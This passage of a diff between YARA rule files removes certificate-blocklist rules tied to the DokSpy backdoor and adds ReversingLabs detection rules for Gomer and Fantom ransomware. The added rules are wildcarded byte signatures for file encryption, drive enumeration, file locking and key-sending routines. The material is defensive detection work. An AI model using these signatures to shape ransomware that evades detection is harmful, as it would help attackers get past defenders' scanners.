8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? ?? + ?? 3B C6 74 ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? + ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 83 + 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? + C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? + FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? + ?? ?? 66 89 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? + ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 + } + $encrypt_file_2 = { + C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? + 33 C0 C7 44 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 66 89 44 + 24 ?? 8D B4 24 ?? ?? ?? ?? 0F 43 BC 24 ?? ?? ?? ?? 8D 44 24 ?? 83 BC 24 ?? ?? ?? ?? + ?? 50 0F 43 B4 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 57 56 8B 00 FF D0 85 C0 68 ?? ?? ?? ?? 0F 95 C3 E8 ?? ?? ?? ?? 83 C4 ?? 85 + C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? + 8D 44 24 ?? 8D B4 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 43 B4 24 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 56 8B 00 FF D0 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A + ?? 50 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 + 84 24 ?? ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 83 EC ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 4C + 24 ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? 8B 58 ?? 03 18 E8 ?? ?? ?? + ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? + ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 33 C9 8B 00 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 + 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? + ?? ?? ?? 66 89 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 84 + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? + ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8B F8 8D 4C 24 ?? 57 BE ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 4C 24 ?? 8B 41 ?? F6 84 04 ?? ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? BA ?? ?? ?? ?? + 03 C8 8B F3 33 C0 39 41 ?? 0F 44 C2 83 E0 ?? 89 41 ?? 85 41 ?? 74 ?? 6A ?? E8 ?? ?? + ?? ?? 56 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 6A ?? 56 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? F3 0F 6F 00 F3 0F 7F 07 E8 ?? ?? ?? ?? F3 0F 6F + } + $encrypt_file_3 = { + 00 F3 0F 7F 47 ?? F3 0F 6F 40 ?? F3 0F 7F 47 ?? F3 0F 6F 40 ?? 8D 84 24 ?? ?? ?? ?? + 50 51 F3 0F 7F 47 ?? 57 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 + ?? 85 F6 74 ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF B4 24 ?? + ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 85 C0 75 ?? 8B 44 24 ?? 8D 4C 24 ?? 8B 40 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 + ?? 83 C8 ?? 83 E0 ?? 89 41 ?? 85 41 ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 85 F6 74 ?? 56 E8 + ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B3 ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? C6 84 24 ?? + ?? ?? ?? ?? 50 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 32 DB + C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? + ?? 66 89 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF + B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? + ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 + C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 8A C3 C7 84 24 ?? ?? ?? ?? + ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? ?? ?? + ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SJ SYSTEM" and pe.signatures[i].serial=="20:d0:ee:42:fc:90:1e:6b:3a:8f:ef:e8:c1:e6:08:7a" and 1391299199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $encrypt_file_1 and $encrypt_file_2 and $encrypt_file_3 } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_127251B32B9A50Bd : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Gomer : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing OSX DokSpy backdoor." + description = "Yara rule that detects Gomer ransomware." author = "ReversingLabs" - id = "3581085c-a6e7-571f-8253-f8d9e90e78fc" - date = "2023-11-08" - modified = "2023-11-08" + id = "b76ac856-2abe-531d-b093-461569b9afb7" + date = "2020-10-08" + modified = "2020-10-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2158-L2174" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8552ce9e9ab8d6b1025ab3c6e7b2485ef855236114c426475fde0b5f2e231ec9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Gomer.yara#L1-L106" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a53d37fcb877a12a4969a6ea1aaa67fc4106c3fbdd80a4fd39ad5a66a9df47fc" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Gomer" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B + 7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ?? + 03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? + ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F + 5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? + ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ?? + 89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ?? + ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ?? + 8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ?? + 8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7 + } + $find_files_p2 = { + EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 + 57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ?? + ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD + 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85 + ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? + ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D + ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 + ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? + 83 C4 ?? E9 + } + $encrypt_files = { + 55 8B EC 51 8B 45 ?? 53 56 57 8B F9 8B 4F ?? 89 4D ?? 3B C1 77 ?? 8B DF 83 F9 ?? 72 + ?? 8B 1F 8D 34 00 89 47 ?? 56 FF 75 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 1E + 8B C7 5F 5E 5B 8B E5 5D C2 ?? ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B F0 83 CE ?? 81 + FE ?? ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? 8B D1 B8 ?? ?? ?? ?? D1 EA 2B C2 3B C8 76 + ?? BE ?? ?? ?? ?? EB ?? 8D 04 0A 3B F0 0F 42 F0 8D 46 ?? 8D 0C 00 3D ?? ?? ?? ?? 76 + ?? 83 C9 ?? EB ?? 81 F9 ?? ?? ?? ?? 72 ?? 8D 41 ?? 83 CA ?? 3B C1 0F 46 C2 50 E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 58 ?? 83 E3 ?? 89 43 ?? EB ?? 85 C9 74 ?? 51 E8 ?? + ?? ?? ?? 83 C4 ?? 8B D8 EB ?? 33 DB 8B 45 ?? 89 77 ?? 89 47 ?? 8D 34 00 56 FF 75 ?? + 53 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 66 89 04 1E 8B 45 ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? + ?? ?? 8B 07 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? + 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 1F 8B C7 5F 5E 5B 8B E5 5D C2 ?? ?? E8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? CC CC CC CC CC B8 ?? ?? ?? ?? C3 + } + $enum_drives_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 + 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 6A ?? 33 C0 C7 + 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C6 + 45 ?? ?? BF ?? ?? ?? ?? 8D 45 ?? 0F A3 38 0F 83 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D + 47 ?? 0F 43 4D ?? 66 89 01 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 + F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? 66 89 4D ?? C6 45 ?? ?? 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? EB ?? + 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? EB ?? 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? + ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B CE C6 45 ?? ?? F7 E9 83 C4 ?? C1 FA ?? 8B DA C1 EB + ?? 03 DA 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? + ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? + ?? ?? 83 C4 ?? FF 35 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? ?? + ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B CE 89 7D ?? F7 E9 83 C4 ?? 89 5D ?? C1 FA ?? 8D 4D + } + $enum_drives_p2 = { + 8B C2 C1 E8 ?? 03 C2 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? FF 75 + ?? 50 51 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B + 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 + C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 47 83 FF ?? 0F 8C ?? + ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 89 5D ?? C6 45 ?? ?? 8B 4D ?? 8B 31 + 3B F1 0F 84 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? 8B C8 C6 45 + ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F8 C6 45 ?? ?? 8B 4E ?? 89 4F ?? 8B 4E ?? 89 4F ?? 8D + 4F ?? 8B 46 ?? 89 47 ?? 8D 46 ?? 3B C8 74 ?? 83 78 ?? ?? 8B D0 72 ?? 8B 10 FF 70 ?? + 52 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Developer ID Application: Edouard Roulet (W7J9LRHXTG)" and pe.signatures[i].serial=="12:72:51:b3:2b:9a:50:bd" and 1493769599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($enum_drives_p*)) and ( all of ($find_files_p*)) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_48Cad4E6966E22D6 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Fantom : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing OSX DokSpy backdoor." + description = "Yara rule that detects Fantom ransomware." author = "ReversingLabs" - id = "22d62d7e-3f76-5f6b-a3f1-a6b087fb63e2" - date = "2023-11-08" - modified = "2023-11-08" + id = "cd32de8b-2c14-5fb4-be79-365d9848f341" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2176-L2192" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7733b8a97d9f3538db04309a2e3f9df6cb64930b0b6f7f241c3e629be2dd7804" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Fantom.yara#L1-L97" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f2aaa9776b7ca302052b3303d45df24cc151a4efc7ea9f4bb3c1f53d10ded03a" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Fantom" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_1 = { + 00 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? + 26 DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? 13 ?? 02 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 28 + ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? [1-2] 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 [1-2] 20 + ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F + ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 02 7B + ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? + ?? ?? 13 ?? 11 ?? 16 + } + $encrypt_files_2 = { + 72 ?? ?? ?? ?? A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? + 19 72 ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 + ?? 1C 72 ?? ?? ?? ?? A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 72 ?? ?? ?? ?? A2 + 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? + ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? + 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? + ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? + 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 + 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? + ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? + 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? + ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? + 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 + 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? + ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? + 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? + ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? + 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 + 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? + ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? + 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? + ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? + 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 + 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? + ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 + } + $lockfile = { + 02 7B ?? ?? ?? ?? 16 FE ?? 3A ?? ?? ?? ?? 21 EA 17 ?? ?? ?? ?? ?? ?? ?? + 03 73 ?? ?? ?? ?? [2-4] 6F ?? ?? ?? ?? [2-4] 21 00 65 CD 1D + 00 00 00 00 FE ?? 16 FE ?? 2D ?? [2-4] FE ?? 16 FE ?? 2D ?? 03 28 + ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? [1-2] 28 ?? ?? ?? ?? [1-2] + 6F ?? ?? ?? ?? [1-2] 02 ?? [1-2] 28 ?? ?? ?? ?? [1-2] 03 [1-2] 28 ?? ?? + ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? [1-2] ?? FE ?? + 16 FE ?? 2D ?? 2B ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 2B ?? 03 28 ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? [1-2] 28 ?? + ?? ?? ?? [1-2] 6F ?? ?? ?? ?? [1-2] 02 ?? [1-2] 28 ?? ?? ?? ?? [1-2] 03 + [1-2] 28 ?? ?? ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 2A + } + $lockdir = { + 03 28 ?? ?? ?? ?? 0A 03 28 ?? ?? ?? ?? 0B 16 0C 08 06 8E 69 FE ?? 2C ?? + 00 06 08 9A 28 ?? ?? ?? ?? 0D 05 09 28 ?? ?? ?? ?? 16 FE ?? 2D ?? 02 25 + 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 06 08 9A 04 28 ?? ?? ?? ?? DE ?? + 26 DE ?? 26 DE ?? 08 17 58 0C 2B ?? 16 0C 08 07 8E 69 FE ?? 2C ?? 00 02 + 07 08 9A 04 05 28 ?? ?? ?? ?? 02 07 08 9A 04 28 ?? ?? ?? ?? DE ?? 26 DE + ?? 26 DE ?? 08 17 58 0C 2B ?? 2A + } + $sendkey = { + 00 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? + 0C 08 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 72 ?? ?? ?? ?? + 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F + ?? ?? ?? ?? 08 72 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 07 03 72 ?? ?? ?? ?? 08 + 6F ?? ?? ?? ?? 26 07 6F ?? ?? ?? ?? DE ?? 26 DE ?? 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Developer ID Application: Seven Muller (FUP9692NN6)" and pe.signatures[i].serial=="48:ca:d4:e6:96:6e:22:d6" and 1492732799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (( all of ($encrypt_files_*)) and $lockfile and $lockdir and $sendkey) } -import "pe" - -rule 